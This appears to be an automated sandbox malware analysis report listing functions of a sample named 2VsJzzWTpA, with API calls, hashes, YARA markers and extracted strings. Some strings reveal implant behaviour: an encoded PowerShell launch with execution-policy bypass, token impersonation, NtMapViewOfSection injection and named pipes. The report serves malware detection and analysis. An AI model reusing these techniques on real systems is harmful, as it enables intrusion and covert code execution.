                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • htonl.WS2_32 ref: 00676F91
                • recvfrom.WS2_32 ref: 00676FD5
                • WSAGetLastError.WS2_32 ref: 00676FE2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                • String ID:
                • API String ID: 2310505145-0
                • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                • Instruction ID: dacedd6afec655f8603582c3147e2722dd160d8df43d601f604d9943b79852a0
                • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                • Instruction Fuzzy Hash: 5A41C272304B80C2EB10DF25E85476A77A3F799BA8F148225EA8D47B68DF39C491CF41
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                • String ID:
                • API String ID: 1014270282-0
                • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                • Instruction ID: 76af5c70d6d55f15a5d3e694d8c45974960cfc59736c55926a841bf454df5036
                • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                • Instruction Fuzzy Hash: 9B319E3221878486EB20CF52D40439977A6F789FD8F088229EE4D47B58DF7DC605CB04
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                • Instruction ID: d79c40bf3918c9fa484927681f85c025c9643a4f9237e60832a0d1a35a135649
                • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                • Instruction Fuzzy Hash: 90112B3130478691DB155F72AC0179EA691BBA9BC4F48443DFE8997B15EF3CC4528700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                • Instruction ID: a40d540d47b088048bfe16391e653f490ec8f920807c678a62003acf545fab94
                • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                • Instruction Fuzzy Hash: BA112B6131478286FBD1BF22A90131EA7A7BF45BC0F448B25AE8997B15EF3CC4518B15
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2102446242-0
                APIs
                • malloc.LIBCMT ref: 0066FC85
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • free.LIBCMT ref: 0066FCC0
                • fwrite.LIBCMT ref: 0066FD01
                • fclose.LIBCMT ref: 0066FD09
                • free.LIBCMT ref: 0066FD16
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • GetLastError.KERNEL32 ref: 0066FD1B
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1616846154-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                • String ID:
                • API String ID: 3798860377-0
                APIs
                • malloc.LIBCMT ref: 001BE40F
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001BE41D
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • malloc.LIBCMT ref: 001BE43F
                • _snprintf.LIBCMT ref: 001BE45A
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • malloc.LIBCMT ref: 001BE475
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                • String ID: dpoolWait
                • API String ID: 2026495703-1875951006
                APIs
                • malloc.LIBCMT ref: 0067F00F
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 0067F01D
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • malloc.LIBCMT ref: 0067F03F
                • _snprintf.LIBCMT ref: 0067F05A
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • malloc.LIBCMT ref: 0067F075
                Strings
                • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                • API String ID: 3518644649-2739389480
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: freemallocstrchr$rand
                • String ID:
                • API String ID: 1305919620-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: freemallocstrchr$rand
                • String ID:
                • API String ID: 1305919620-0
                APIs
                • malloc.LIBCMT ref: 001A35BD
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A35C8
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • free.LIBCMT ref: 001A36AF
                • free.LIBCMT ref: 001A36B7
                • free.LIBCMT ref: 001A36BF
                • free.LIBCMT ref: 001A36CB
                • free.LIBCMT ref: 001A36D8
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                APIs
                • malloc.LIBCMT ref: 006641BD
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 006641C8
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • free.LIBCMT ref: 006642AF
                • free.LIBCMT ref: 006642B7
                • free.LIBCMT ref: 006642BF
                • free.LIBCMT ref: 006642CB
                • free.LIBCMT ref: 006642D8
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: htonl$freemalloc
                • String ID: zyxwvutsrqponmlk
                • API String ID: 1249573706-3884694604
                APIs
                • GetModuleHandleA.KERNEL32 ref: 00673FE7
                • GetProcAddress.KERNEL32 ref: 00673FF7
                • GetLastError.KERNEL32 ref: 006740BF
                  • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                  • Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                • String ID: NtMapViewOfSection$ntdll.dll
                • API String ID: 1006775078-3170647572
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strtok$_getptd_time64malloc
                • String ID: eThreadpoolTimer
                • API String ID: 1522986614-2707337283
                APIs
                • malloc.LIBCMT ref: 001B13D2
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • _snprintf.LIBCMT ref: 001B13F1
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • remove.LIBCMT ref: 001B13FD
                • remove.LIBCMT ref: 001B1404
                Strings
                • uld not open process: %d (%u), xrefs: 001B13D7
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: uld not open process: %d (%u)
                • API String ID: 2566950902-823969559
                APIs
                • malloc.LIBCMT ref: 00671FD2
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • _snprintf.LIBCMT ref: 00671FF1
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • remove.LIBCMT ref: 00671FFD
                • remove.LIBCMT ref: 00672004
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: %s\%s
                • API String ID: 1896346573-4073750446
                APIs
                • _snprintf.LIBCMT ref: 001ADB25
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                  • Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5
                • _snprintf.LIBCMT ref: 001ADBBD
                  • Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
                  • Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C
                  • Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
                  • Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3
                • _snprintf.LIBCMT ref: 001ADBD4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                • API String ID: 199363273-1250630670
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                APIs
                • malloc.LIBCMT ref: 001A493A
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A4945
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • free.LIBCMT ref: 001A4A2C
                • free.LIBCMT ref: 001A4A34
                • free.LIBCMT ref: 001A4A40
                • free.LIBCMT ref: 001A4A4D
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                APIs
                • malloc.LIBCMT ref: 0066553A
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 00665545
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • free.LIBCMT ref: 0066562C
                • free.LIBCMT ref: 00665634
                • free.LIBCMT ref: 00665640
                • free.LIBCMT ref: 0066564D
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                APIs
                  • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
                  • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
                  • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
                  • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
                  • Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D
                • strchr.LIBCMT ref: 00672DD6
                • _snprintf.LIBCMT ref: 00672E0C
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • _snprintf.LIBCMT ref: 00672E23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                • String ID: %s&%s$?%s
                • API String ID: 1095232423-1750478248
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                • String ID:
                • API String ID: 2998201375-0
                • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                • Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
                • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                • Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701
                APIs
                • malloc.LIBCMT ref: 001AF085
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • free.LIBCMT ref: 001AF0C0
                • fwrite.LIBCMT ref: 001AF101
                • fclose.LIBCMT ref: 001AF109
                • free.LIBCMT ref: 001AF116
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$free$_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1696598829-0
                • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                • Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
                • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                • Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740
                APIs
                • _errno.LIBCMT ref: 001C99FD
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C99F5
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                • Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
                • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                • Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710
                APIs
                • _errno.LIBCMT ref: 0068A5FD
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 0068A5F5
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                • Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
                • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                • Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                • strrchr.LIBCMT ref: 001B52ED
                • _snprintf.LIBCMT ref: 001B539B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintfmallocstrrchr
                • String ID: Failed to impersonate token: %d$t permissions in process: %d
                • API String ID: 3587327836-1492073275
                • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                • Instruction ID: 352770fe634819318cdb85f5b69be49ea66c76f3b606d11a1e4ac64c4e353384
                • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                • Instruction Fuzzy Hash: 1B41B135704A8096DB14FB22B9147AF6792B79AFD4F488125EE5A4BB69DF3CC442C700
                APIs
                • CreatePipe.KERNEL32 ref: 006728A3
                • GetStartupInfoA.KERNEL32 ref: 006728AD
                • Sleep.KERNEL32 ref: 006728F4
                  • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
                  • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$CreateInfoPipeSleepStartup
                • String ID: h
                • API String ID: 1809008225-2439710439
                • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                • Instruction ID: 9dac431128a5d33a1cca976349f8c7763e936ef93a065078d3ae7311692ea35b
                • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                • Instruction Fuzzy Hash: CA419A32604B889AE750CF65E84078EB7B6F788798F504219EF9C53B68DF38D646CB40
